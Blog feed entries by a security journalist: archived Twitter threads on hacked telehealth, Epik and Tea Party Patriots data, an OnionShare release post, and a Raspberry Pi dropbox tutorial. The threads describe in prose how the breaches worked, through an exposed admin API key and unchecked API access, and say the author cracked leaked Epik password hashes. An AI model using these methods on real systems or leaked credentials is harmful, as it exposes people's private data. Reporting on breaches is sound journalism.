<p>People in ALL 50 states and DC sought quack medicine from AFLDS. 8.6k in California, 8k in Florida, and 7.4k in Texas. Over 1k people in 21 states. Here's an interactive map of cities that patients live in, for cities with at least 10 patients <a href="https://api.mapbox.com/styles/v1/micahflee/cktt2k7972k3r18mrhqdz9ji8.html?title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw&zoomwheel=true&fresh=true#4.14/34.59/-97.68/0/12">https://api.mapbox.com/styles/v1/micahflee/cktt2k7972k3r18mrhqdz9ji8.html?title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw&zoomwheel=true&fresh=true#4.14/34.59/-97.68/0/12</a></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 69 Retweets, 361 Likes</em></p>
<hr>
<p>The hacker says the Cadence and Ravkoo were "hilariously easy" to hack.</p>
<p>Any user could ask Cadence's API for any patient data, and it gave it. The hacker simply asked for all the data.</p>
<p>Ravkoo's site had "a hidden admin panel that every user can log in to and view all the data"</p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 76 Retweets, 406 Likes</em></p>
<hr>
<p>Read the article for more details on the people who figured out how to make massive amounts of 💵💵💵 off the Covid-19 pandemic <a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/</a></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 121 Retweets, 392 Likes</em></p>
Goodbye, passwords in OnionShare2021-09-26T00:00:00ZMicah Leeurn:uuid:f9b46d62-2eca-3a7c-8e95-9ca2879253ea<p>I'm excited to announce that OnionShare 2.4 is now out and the major change in this version is that we've completely gotten rid of passwords! Private OnionShare services are now protected using private keys (aka <a href="https://community.torproject.org/onion-services/advanced/client-auth/">client authentication</a>) on the Tor layer instead of instead of basic authentication on the HTTP layer. Check out the new version at <a href="https://onionshare.org">onionshare.org</a>!</p>
<p>Before today, OnionShare web addresses looked something like this:</p>
<pre><code>http://onionshare:constrict-purity@by4im3ir5nsvygprmjq74xwplrkdgt44qmeapxawwikxacmr3dqzyjad.onion
</code></pre>
<p>The first part, <code>onionshare:constrict-purity</code>, is an HTTP basic authentication username (always 'onionshare') and random password. Basically, if you load that address in Tor Browser without the username and password part, it would prompt the user to login. If you didn't have the password and guessed wrong enough times, OnionShare would detect a potential attack and shut down the service.</p>
<p>Today though, the passwords are gone! OnionShare 2.4 addresses look something like this:</p>
<pre><code>http://oy5oaslxxzwib7fsjaiz5mjeyg3ziwdmiyeotpjw6etxi722pn7pqsyd.onion
</code></pre>
<p>And the private keys look something like this:</p>
<pre><code>K3N3N3U3BURJW46HZEZV2LZHBPKEFAGVN6DPC7TY6FHWXT7RLRAQ
</code></pre>
<p>When you start an OnionShare service you get both, and you have to give both to the people who want to use your service. For example, lets say you want to send a super secret Nintendo ROM to your friend. You open OnionShare, drag the file in, and start the server.</p>
<p><img src="qbert1.png" alt=""></p>
<p>You open up an encrypted messaging app like Signal and then send <em>both</em> the OnionShare address and the private key. When your friend opens Tor Browser and pastes the address, Tor itself will pop up a little window asking for the private key.</p>
<p><img src="qbert2.png" alt=""></p>
<p>If they don't have it then it's simply impossible to connect.</p>
<p><img src="qbert3.png" alt=""></p>
<p>Once your friend copies and pastes the correct private key, they can access the onion site like normal and download the secret Nintendo ROM.</p>
<p><img src="qbert4.png" alt=""></p>
<p>The command line version, of course, works the same way. Let's say you want to set up a secret chat room. You can do that like this (in this case, running the command line version from the <a href="https://snapcraft.io/onionshare">snap package</a>):</p>
<pre><code>onionshare.cli --chat --title "retro gamerz only"
</code></pre>
<p><img src="qbert5.png" alt="">
<img src="qbert6.png" alt=""></p>
<p>If you want to run a <a href="https://docs.onionshare.org/2.4/en/advanced.html#turn-off-private-key">public OnionShare service</a> that anyone can access and doesn't have a secret key, like if you're setting up an anonymous dropbox, then just check the "This is a public OnionShare service (disables private key)" box before starting the server, or use the <code>--public</code> flag on the command line.</p>
Twitter Thread: Epik's utter lack of security & terrible decisions boggle my mind2021-09-24T00:00:00ZMicah Leeurn:uuid:b1813044-102a-3348-a7d5-943e577a3f30<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1441554221183033346">https://twitter.com/micahflee/status/1441554221183033346</a></p>
<hr>
<p>Epik's utter lack of security & terrible decisions boggle my mind. They logged plaintext passwords for login failures, MD5(password) on success.</p>
<p>I tried cracking all MD5s using a wordlist of the plaintexts...</p>
<p>Now I have 11,000 actual passwords used by Epik customers #EpikFail</p>
<p><em>Posted 5:04 PM · Sep 24, 2021, 218 Retweets, 1,132 Likes</em></p>
<hr>
<p>Importing them all into a database so I can see what the most popular passwords are of these 12k cracked one...</p>
<p>(note that the updated rows number could be misleading, it could be the same user logging on many times I'm pretty sure)</p>
<video src="1442318692272857093.mp4" controls width="640" height="360">Your browser does not support the video tag.</video><p><em>Posted 7:42 PM · Sep 26, 2021, 4 Retweets, 49 Likes</em></p>
<hr>
<p>The most popular passwords out of the 12k that I cracked</p>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 9:00 PM · Sep 26, 2021, 14 Retweets, 45 Likes</em></p>
Twitter Thread: 327GB of membership, donation, and petition signature records from the Tea Party Patriots2021-08-05T00:00:00ZMicah Leeurn:uuid:f0612a54-3770-3237-8669-c0a621a80a53<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1423331060465631236">https://twitter.com/micahflee/status/1423331060465631236</a></p>
<hr>
<p>Remember the Tea Party movement? Someone hacked their biggest group, @TPPatriots, and sent me 327gb of membership, donation, and petition signature records, including phone numbers, addresses, detailed activity history, and password hashes <a href="https://theintercept.com/2021/08/05/tea-party-patriots-hacked-billionaire-donors/">https://theintercept.com/2021/08/05/tea-party-patriots-hacked-billionaire-donors/</a></p>
<p><em>Posted 10:12 AM · Aug 5, 2021, 534 Retweets, 1,242 Likes</em></p>
<hr>
<p>TPP was founded in 2009 basically to protest Obama, Obamacare, and big government.</p>
<p>They were involved in Trump's "March to Save America" rally before the Jan 6 attack on the Capitol, and they spread COVID-19 misinformation early in the pandemic.</p>
<p><em>Posted 10:13 AM · Aug 5, 2021, 65 Retweets, 232 Likes</em></p>
<hr>
<p>Turns out, a few super rich donors account for most of the TPP non-profit's donations for multiple years.</p>
<p>In 2019 the non-profit got $1.2M in revenue. One was Texas billionaire Christopher Goldsbury, who on September 11, 2019 wired $1,000,000.</p>
<p><em>Posted 10:14 AM · Aug 5, 2021, 94 Retweets, 246 Likes</em></p>
<hr>
<p>In 2015 the non-profit got $106k in revenue, hacked data shows from only 2 donors.</p>
<p>$100,000 of that came from now-deceased California real-estate billionaire Sanford Diller, who donated a total of $400k to TPP's organizations.</p>
<p><em>Posted 10:15 AM · Aug 5, 2021, 49 Retweets, 159 Likes</em></p>
<hr>
<p>Interesting note about Sanford Diller:</p>
<p>He was also allegedly involved in an illegal scheme to trade millions of dollars in political donations in exchange for a pardon from Donald Trump for a friend of his <a href="https://abcnews.go.com/Politics/billionaire-pardon-effort-pledged-massive-donation-trump-sources/story?id=74656249">https://abcnews.go.com/Politics/billionaire-pardon-effort-pledged-massive-donation-trump-sources/story?id=74656249</a></p>
<p><em>Posted 10:15 AM · Aug 5, 2021, 75 Retweets, 209 Likes</em></p>
<hr>
<p>Another major donor is David Gore (an Oregan libertarian who's family owns the Gore-Tex fabric company), who stays out of the pubic light. Between 2018 and 2021, he's given:</p>
<ul>
<li>$50,000 to TPP Action, 501c4</li>
<li>$275,000 to TPP's super PAC</li>
<li>$124,000 to TPP Foundation, 501c3</li>
</ul>
<p><em>Posted 10:16 AM · Aug 5, 2021, 77 Retweets, 163 Likes</em></p>
<hr>
<p>TPP frequently claims to have "over 3 million" supporters, but this doesn't seem to be even close to true.</p>
<p>The hacked data (which could be incomplete) shows the real number is closer to 500k supporters, and only 144k of those are listed as "active"</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 10:18 AM · Aug 5, 2021, 68 Retweets, 178 Likes</em></p>
<hr>
<p>Because the data has home addresses, we could map cities with active users. Houston has the most, 984, followed by San Antonia, Las Vegas, then Phoenix.
Are there Tea Party people in your area?</p>
<p>(This map shows cities (with >=10 users), not home addresses)</p>
<p><a href="https://api.mapbox.com/styles/v1/micahflee/ckrpgf4g502wd18pldmbvkpwg.html?fresh=true&title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw#4.07/38.67/-96.61">https://api.mapbox.com/styles/v1/micahflee/ckrpgf4g502wd18pldmbvkpwg.html?fresh=true&title=view&access_token=pk.eyJ1IjoibWljYWhmbGVlIiwiYSI6ImNrcm1qMHRlMDBqd2gyb21vMjN1MXA5cmkifQ.dFhnF3fZkg2iy6KBKQdybw#4.07/38.67/-96.61</a></p>
<p><em>Posted 10:20 AM · Aug 5, 2021, 74 Retweets, 174 Likes</em></p>
<hr>
<p>TPP is a conservative activist group. Back in mid-2015 to mid-2017 they frequently had petitions that got >20k signatures with names like:</p>
<ul>
<li>No Funding for Illegals</li>
<li>Save Our Constitution</li>
<li>Support Senator Jeff Sessions</li>
<li>Trump Won, Get Over It</li>
</ul>
<p><em>Posted 10:22 AM · Aug 5, 2021, 33 Retweets, 123 Likes</em></p>
<hr>
<p>But their activism division has really waned since then. There's only been 3 petitions with more than 8k signatures since then.</p>
<p>Their latest "Stop Critical Race Theory" petition only got 34 signatures in its first 2 weeks.</p>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 10:22 AM · Aug 5, 2021, 34 Retweets, 124 Likes</em></p>
<hr>
<p>Their most popular petition of all time, "Make Adam Schiff Resign", got 70k signatures.</p>
<p>This was during Trump's first impeachment inquiry. Schiff was a lead investigator into allegations that Trump withheld funds from Ukraine in exchange for investigations into the Bidens.</p>
<p><em>Posted 10:23 AM · Aug 5, 2021, 28 Retweets, 108 Likes</em></p>
<hr>
<p>A quick note about the password hashes in the hacked data:</p>
<p>The data has hashes for 13,000 users, and they're all hashed used salted MD5. MD5 is totally broken, so it's likely most of the original passwords could be recovered with normal GPUs and not too much time.</p>
<p><em>Posted 10:25 AM · Aug 5, 2021, 22 Retweets, 104 Likes</em></p>
<hr>
<p>So, why hack Tea Party Patriots? The hacker, who identifies with Anonymous, says it's because TPP was responsible for a lot of early COVID-19 misinformation, promoting hydroxychloroquine as a cure (it's not)</p>
<p><img src="image3a.png" alt="">
<img src="image3b.png" alt=""></p>
<p><em>Posted 10:29 AM · Aug 5, 2021, 63 Retweets, 177 Likes</em></p>
<hr>
<p>It turns out, if you viewed the source of any of TPP's petitions there was an 💫ADMINISTRATOR💫 API key. This "Wear Red on Trump's Birthday" petition is the one the hacker looked at to find this API key</p>
<p><img src="image4a.jpg" alt="">
<img src="image4b.jpg" alt=""></p>
<p><em>Posted 10:34 AM · Aug 5, 2021, 49 Retweets, 176 Likes</em></p>
<hr>
<p>Using this API key, they could access ALL OF TPP'S DATA. So they did.</p>
<p>They made over 800,000 API requests and downloaded details of ~800 local chapters and all their members, all the petitions and everyone who signed or donated.</p>
<p>Each of these users is full of detailed info.</p>
<p><em>Posted 10:34 AM · Aug 5, 2021, 36 Retweets, 148 Likes</em></p>
<hr>
<p>It turns out with this administrator API key it's not only possible to download all their data, but also to change it. For a few weeks in July, ALL of TPP's petitions were renamed to "Stop the Computer Fraud and Abuse Act"</p>
<p><img src="image5.jpg" alt=""></p>
<p><em>Posted 10:35 AM · Aug 5, 2021, 39 Retweets, 171 Likes</em></p>
Twitter Thread: Glenn Greenwald supporting the American fascist movement dressed up as "media criticism"2021-05-13T00:00:00ZMicah Leeurn:uuid:8f77c4cc-eb3b-3485-bc94-1e6e299b4f3b<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1392889268918538243">https://twitter.com/micahflee/status/1392889268918538243</a></p>
<hr>
<p>Glenn's only real journalism since Snowden was the Lavo Jato Brazil corruption stories, which I helped make possible for him. Everything else has been supporting the American fascist movement dressed up as "media criticism"</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The Intercept took this person trained to do computer work and now lets him pretend to be a "journalist." He's the one who -- like the FBI/NSA -- is digging through the personal data of ordinary Gab users to dox them. Read his exchange with a real journalist asking him about it: <a href="https://t.co/v6j4SRpawk">https://t.co/v6j4SRpawk</a></p>— Glenn Greenwald (@ggreenwald) <a href="https://twitter.com/ggreenwald/status/1392638621077938179?ref_src=twsrc%5Etfw">May 13, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 10:07 AM · May 13, 2021, 615 Retweets, 4,282 Likes</em></p>
<hr>
<p>On another note, I recently learned that my reporting on Zoom lying about encryption, which triggered an FTC investigation and caused Zoom to add <em>actual</em> E2EE, is now required reading at UC Berkeley <a href="https://theintercept.com/2020/03/31/zoom-meeting-encryption/">https://theintercept.com/2020/03/31/zoom-meeting-encryption/</a></p>
<p><em>Posted 10:07 AM · May 13, 2021, 51 Retweets, 642 Likes</em></p>
<hr>
<p>The technical Snowden reporting that I'm most proud of, the series on XKEYSCORE, has Glenn's name attached but he didn't actually do any work on it. (Neither did Morgan actually...) <a href="https://theintercept.com/2015/07/01/nsas-google-worlds-private-communications/">https://theintercept.com/2015/07/01/nsas-google-worlds-private-communications/</a></p>
<p><em>Posted 10:07 AM · May 13, 2021, 57 Retweets, 582 Likes</em></p>
<hr>
<p>And with that, I'm gonna log off twitter for a bit ✨</p>
<p><em>Posted 10:07 AM · May 13, 2021, 2 Retweets, 367 Likes</em></p>
<hr>
<p>I tried explaining what's going on to my mom and she said, "Why is Glenn Greenwald so grumpy?"</p>
<p>I don't know, Mom. I don't think anyone knows.</p>
<p><em>Posted 8:31 AM · May 14, 2021, 25 Retweets, 379 Likes</em></p>
Twitter Thread: Glenn Greenwald-related social engineering/death threats2021-05-04T00:00:00ZMicah Leeurn:uuid:63a38d93-66b0-35c1-86f1-8b216ba07c02<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1396872399824384000">https://twitter.com/micahflee/status/1396872399824384000</a></p>
<hr>
<p>We're lucky that American fascists are so incompetent at things like social engineering, insurrections, etc.</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 9:55 AM · May 24, 2021, 110 Retweets, 1,882 Likes</em></p>
<hr>
<p>This other person trying to socially engineer me with this voicemail message is confused. I'm not member of ANTIFA and therefore have no authority to negotiate treaties on their behalf with the BLM movement.</p>
<p>I'm a Sergeant in the ANFTIA Radical Fridge -- it's a common mistake.</p>
<video src="1396921832020738048.mp4" controls width="640" height="360">Your browser does not support the video tag.</video><p><em> Posted 1:15 PM · May 24, 2021, 40 Retweets, 570 Likes</em></p>
Running an OnionShare anonymous dropbox on a Raspberry Pi2021-02-24T00:00:00ZMicah Leeurn:uuid:f14fd19e-7dce-33c5-b3f8-abd86fbe0f9c<p>Now that the command line version of OnionShare has <a href="https://micahflee.com/2021/02/onionshare-tabs-anonymous-chat-cli/">better support for running on headless Linux servers</a>, I figured I should set up a dedicated <a href="https://www.raspberrypi.org/">Raspberry Pi</a> anonymous dropbox server, and while I'm at it document how I'm doing it in a blog post.</p>
<h2 id="find-a-raspberry-pi">Find a Raspberry Pi</h2><p>Personally, I dug through my cardboard box full of random electronics and pulled out a trusty old Raspberry Pi 3 Model B. After all, who among us doesn't have extra Raspberry Pis laying around in piles of old electronics? If you're not as fortunate as I, at the time of writing the fanciest model is the Raspberry Pi 4 Model B, and it costs $35.</p>
<p>Raspberry Pis use microSD cards as their hard drive, so you'll also need a microSD card reader that you can plug into your computer to set it up, a micro-USB cable to provide power to your Pi, and an internet connection (ethernet is simplest, but wifi works too).</p>
<h2 id="install-ubuntu-server-20-04-on-the-pi">Install Ubuntu Server 20.04 on the Pi</h2><p>Follow <a href="https://ubuntu.com/tutorials/how-to-install-ubuntu-on-your-raspberry-pi#1-overview">this tutorial that Ubuntu makes</a> to install Ubuntu on your Pi -- that's what I'm doing. I'm using the Ubuntu Server 20.04.2 LTS (RPi 3/4/400) 64-bit image. Once you get to the step "4. Boot Ubuntu Server" you can come back here.</p>
<p>I don't feel like plugging an HDMI cable and USB keyboard into my Pi, so after plugging in ethernet and power, I'm going to need to discover my Pi's IP address so I can connect to it remotely over the network. I'm using <a href="https://nmap.org/">nmap</a> to do this. You can install it from your Linux package manager, from Homebrew on a Mac, or from nmap's website on Windows)</p>
<p>Because my local network IP address is <code>192.168.1.x</code>, I'm going to scan my whole subnet (<code>192.168.1.0/24</code>) for computers with the SSH port (22) open, and one of them is bound to be my Pi:</p>
<pre>
$ nmap -p22 --open 192.168.1.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-23 17:51 PST
Nmap scan report for 192.168.1.46
Host is up (0.0015s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (7 hosts up) scanned in 3.13 seconds
</pre><p>There it is, my Pi's IP address is <code>192.168.1.46</code>. So let's see if I can SSH into it. If you're following along, make sure to use the IP of <em>your</em> Pi, as it's probably different than mine. The default username and password are both <code>ubuntu</code>.</p>
<pre>
$ ssh ubuntu@192.168.1.46
The authenticity of host '192.168.1.46 (192.168.1.46)' can't be established.
ECDSA key fingerprint is SHA256:tdB9dxpe4dIpFfvbjNdPpPVLeBlpTXaSu6SCaabjyFc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.46' (ECDSA) to the list of known hosts.
ubuntu@192.168.1.46's password:
You are required to change your password immediately (administrator enforced)
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1028-raspi aarch64)
[...snip...]
</pre><p>Accept the fingerprint. After logging in, you're forced to reset the password. Set it to something random and save it in your password manager. You do use a <a href="https://ssd.eff.org/en/module/creating-strong-passwords">password manager</a>, right?</p>
<p>After you reset your password, your connection will close and you'll need to SSH in again:</p>
<pre>
[...snip...]
WARNING: Your password has expired.
You must change your password now and login again!
Changing password for ubuntu.
Current password:
New password:
Retype new password:
passwd: password updated successfully
Connection to 192.168.1.46 closed.
$ ssh ubuntu@192.168.1.46
ubuntu@192.168.1.46's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1028-raspi aarch64)
[...snip...]
ubuntu@ubuntu:~$
</pre><p><em>(hacker voice)</em> <strong>I'm in.</strong></p>
<p>Go ahead and install updates by running:</p>
<pre>
sudo apt update
sudo apt upgrade -y
</pre><h2 id="install-onionshare">Install OnionShare</h2><p>OnionShare is written in python, and you can install the <a href="https://docs.onionshare.org/2.3.1/en/advanced.html#command-line-interface">command line version</a> use python's package manager <code>pip</code>. So first, I must install <code>pip</code>:</p>
<pre>
sudo apt install python3-pip
</pre><p>Now I'm going to install OnionShare itself:</p>
<pre>
pip3 install --user onionshare-cli
</pre><p>When you install programs with <code>pip</code> and use the <code>--user</code> flag, it installs them into <code>~/.local/bin</code>, which isn't in your path by default. This will add <code>~/.local/bin</code> to your path automatically for the next time you SSH into your Pi:</p>
<pre>
echo "PATH=\$PATH:~/.local/bin" >> ~/.bashrc
source ~/.bashrc
</pre><p>Okay, now try running <code>onionshare-cli</code>. You should see the usage information:</p>
<p><img src="onionshare-usage.png" alt=""></p>
<h2 id="test-it-out-install-tor">Test it out (install tor)</h2><p>Great, so let's start by seeing if we can run a chat server:</p>
<pre>
$ onionshare-cli --chat
OnionShare 2.3.1 | https://onionshare.org/
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ___ _
@@@@@@ @@@@@@@@@@@@@ / _ \ (_)
@@@@ @ @@@@@@@@@@@ | | | |_ __ _ ___ _ __
@@@@@@@@ @@@@@@@@@@ | | | | '_ \| |/ _ \| '_ \
@@@@@@@@@@@@ @@@@@@@@@@ \ \_/ / | | | | (_) | | | |
@@@@@@@@@@@@@@@@ @@@@@@@@@ \___/|_| |_|_|\___/|_| |_|
@@@@@@@@@ @@@@@@@@@@@@@@@@ _____ _
@@@@@@@@@@ @@@@@@@@@@@@ / ___| |
@@@@@@@@@@ @@@@@@@@ \ `--.| |__ __ _ _ __ ___
@@@@@@@@@@@ @ @@@@ `--. \ '_ \ / _` | '__/ _ \
@@@@@@@@@@@@@ @@@@@@ /\__/ / | | | (_| | | | __/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \____/|_| |_|\__,_|_| \___|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
You must install tor to use OnionShare from the command line
</pre><p>Oh right, I need to install tor. That's easy:</p>
<pre>
sudo apt install tor
</pre><p>Okay, let's try again:</p>
<pre>
$ onionshare-cli --chat
OnionShare 2.3.1 | https://onionshare.org/
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ___ _
@@@@@@ @@@@@@@@@@@@@ / _ \ (_)
@@@@ @ @@@@@@@@@@@ | | | |_ __ _ ___ _ __
@@@@@@@@ @@@@@@@@@@ | | | | '_ \| |/ _ \| '_ \
@@@@@@@@@@@@ @@@@@@@@@@ \ \_/ / | | | | (_) | | | |
@@@@@@@@@@@@@@@@ @@@@@@@@@ \___/|_| |_|_|\___/|_| |_|
@@@@@@@@@ @@@@@@@@@@@@@@@@ _____ _
@@@@@@@@@@ @@@@@@@@@@@@ / ___| |
@@@@@@@@@@ @@@@@@@@ \ `--.| |__ __ _ _ __ ___
@@@@@@@@@@@ @ @@@@ `--. \ '_ \ / _` | '__/ _ \
@@@@@@@@@@@@@ @@@@@@ /\__/ / | | | (_| | | | __/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \____/|_| |_|\__,_|_| \___|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Connecting to the Tor network: 100% - Done
Give this address to the recipient:
http://onionshare:appetizer-acid@hhzxxzfsx34ckxjtl3z6cjgfk73tyr3fxbsu3rumiqsgdz6nvmorhnyd.onion
Press Ctrl+C to stop the server
</pre><p>Load the OnionShare address you see in Tor Browser to make sure it works.</p>
<p><img src="torbrowser-chat.png" alt=""></p>
<p>Great.</p>
<p>Press Ctrl-C to quit OnionShare.</p>
<h2 id="start-a-persistent-anonymous-dropbox">Start a persistent anonymous dropbox</h2><p>To let people anonymously upload files to your computer (in this case, your Raspberry Pi) you use <a href="https://docs.onionshare.org/2.3.1/en/features.html#receive-files">receive mode</a>. In the command line this is the <code>--receive</code> flag.</p>
<p>You'll also want to make sure you use <code>--persistent</code>. This will save the Tor onion key into a file so that if you ever, for example, reboot your Raspberry Pi, you can start up your service with the exact same OnionShare address.</p>
<p>You'll also probably want to use <code>--public</code> which disables the default password protection. Basically, this lets you post a link to your anonymous dropbox <a href="https://twitter.com/kenklippenstein/status/1363744555435249665">on Twitter</a> (for example) and anyone can go there to anonymously leak documents to you.</p>
<p>Putting it all together:</p>
<pre>
$ onionshare-cli --receive --persistent ~/anon-dropbox.session --public
OnionShare 2.3.1 | https://onionshare.org/
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ___ _
@@@@@@ @@@@@@@@@@@@@ / _ \ (_)
@@@@ @ @@@@@@@@@@@ | | | |_ __ _ ___ _ __
@@@@@@@@ @@@@@@@@@@ | | | | '_ \| |/ _ \| '_ \
@@@@@@@@@@@@ @@@@@@@@@@ \ \_/ / | | | | (_) | | | |
@@@@@@@@@@@@@@@@ @@@@@@@@@ \___/|_| |_|_|\___/|_| |_|
@@@@@@@@@ @@@@@@@@@@@@@@@@ _____ _
@@@@@@@@@@ @@@@@@@@@@@@ / ___| |
@@@@@@@@@@ @@@@@@@@ \ `--.| |__ __ _ _ __ ___
@@@@@@@@@@@ @ @@@@ `--. \ '_ \ / _` | '__/ _ \
@@@@@@@@@@@@@ @@@@@@ /\__/ / | | | (_| | | | __/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \____/|_| |_|\__,_|_| \___|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Connecting to the Tor network: 100% - Done
* Running on http://127.0.0.1:17636/ (Press CTRL+C to quit)
Files sent to you appear in this folder: /home/ubuntu/OnionShare
Warning: Receive mode lets people upload files to your computer. Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.
Give this address to the sender:
http://vxat6yszh7o5r2fxzvibxsb4lmfi6yzudobn3o3yz2vhvue3z2xmbqid.onion
Press Ctrl+C to stop the server
</pre><p>Now, load the OnionShare address in Tor Browser to make sure it works.</p>
<p><img src="torbrowser-receive.png" alt=""></p>
<p>It works!</p>
<p>And live web logs get displayed in the terminal as well. For example when I loaded the OnionShare address, this was displayed in the terminal:</p>
<pre>
127.0.0.1 - - [24/Feb/2021 02:36:06] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:07] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/css/style.css HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/js/jquery-3.5.1.min.js HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/js/receive.js HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/img/logo.png HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/img/logo_large.png HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:09] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/img/favicon.ico HTTP/1.1" 200 -
</pre><p>You'll never get to know the IP addresses of people who visit your onion site. Their IP will always look like <code>127.0.0.1</code>. This is how Tor onion services work: you run a service anonymously, and all the clients that connect to your service are anonymous as well. If someone loads your anonymous dropbox while you happen to be looking at the terminal, you'll be able to tell that someone is there because you'll see the logs they generate, but you won't know who it is.</p>
<h2 id="upload-a-file-and-then-see-what-was-uploaded">Upload a file, and then see what was uploaded</h2><p>Now, let's try uploading a file. In my case, I'm uploading a ~2.6mb file called <code>IMG_0417.jpg</code>.</p>
<p>In the terminal you can see the progress of the file as it uploads, and then you can see the location it was saved to:</p>
<pre>
=> 2.5 MiB IMG_0417.jpg
Received: /home/ubuntu/OnionShare/2021-02-24/22.29.20/IMG_0417.jpg
127.0.0.1 - - [24/Feb/2021 22:29:29] "POST /upload-ajax HTTP/1.1" 200 -
</pre><p>But now, how do I actually access this file? There are many ways. Here are some options:</p>
<h3 id="in-macos-or-windows">In macOS or Windows</h3><p>If you use macOS or Windows you can use SFTP software like <a href="https://cyberduck.io/">Cyberduck</a>. For example, here I'm setting up a new connection in Cyberduck called <code>onionsharepi</code>:</p>
<p><img src="cyberduck1.png" alt=""></p>
<p>Then when I connect to it, I can browse the files and download anything to my computer:</p>
<p><img src="cyberduck2.png" alt=""></p>
<p>And finally, I can open <code>IMG_0417.jpg</code> and see what this image I uploaded was.</p>
<p><img src="tor-mask.png" alt=""></p>
<h3 id="in-linux">In Linux</h3><p>In Ubuntu (or other distros that use nautilus as the file manager), I open the file manager, go to "Other Locations", and connect to the server <code>sftp://ubuntu@192.168.1.46/</code>.</p>
<p><img src="ubuntu-files1.png" alt=""></p>
<p>Now I have access to the files that get uploaded to my anonymous dropbox:</p>
<p><img src="ubuntu-files2.png" alt=""></p>
<h2 id="make-sure-the-anonymous-dropbox-is-actually-persistent">Make sure the anonymous dropbox is actually persistent</h2><p>The command we used to start OnionShare in receive mode is:</p>
<pre>
onionshare-cli --receive --persistent ~/anon-dropbox.session --public
</pre><p>This stores all the settings associated with this session, including the secret key required to get this same Tor onion address, in the file <code>anon-dropbox.session</code>.</p>
